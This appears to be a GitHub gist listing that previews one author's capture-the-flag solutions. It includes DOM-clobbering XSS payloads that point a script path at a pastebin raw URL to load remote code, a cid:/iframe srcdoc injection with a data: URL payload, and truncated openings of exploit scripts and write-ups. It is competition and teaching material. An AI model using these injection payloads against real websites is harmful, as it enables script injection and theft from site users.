Skip to content

Instantly share code, notes, and snippets.

View terjanq's full-sized avatar

terjanq

769 followers · 9 following
View GitHub Profile
@terjanq
terjanq / solution-214.html
Created September 23, 2019 20:38
XSS Challenge DOM Clobbering
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>
@terjanq
terjanq / solution-212.html
Last active September 24, 2019 13:36
XSS Challenge DOM Clobbering
<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T
@terjanq
terjanq / solution-225.html
Last active September 25, 2019 10:25
XSS Challenge DOM Clobbering
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>
@terjanq
terjanq / car_repair.js
Created October 24, 2019 12:15
Solutions from hacklu 2019 CTF
/*
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
*/
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
@terjanq
terjanq / writeupBin_for_bots.py
Created December 29, 2019 20:24
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
@terjanq
terjanq / part1.py
Last active April 20, 2020 18:21
Stegasaurus Ccratch solution (PlaidCTF 2020)
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.
import random
from math import factorial
SET_SIZE = 8
MAX_VAL = 40000
# get random 8 integers
@terjanq
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@terjanq
terjanq / writeup.md
Last active May 20, 2021 01:43
Politer Note - writeup

Write-up

Solution

<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
@terjanq
terjanq / README.md
Last active October 23, 2021 14:18
TokyoWesterns CTF 2020 | writeups by @terjanq

TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
@terjanq
terjanq / secdriven.md
Last active June 18, 2022 11:58
A TL;DR solution to Security Driven by @terjanq

A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only admin had access to it, because the file was private.

Disclamer: The write-up is written on airplane therefore the quality of it is poor, mostly to showcase the required steps to solve the challenge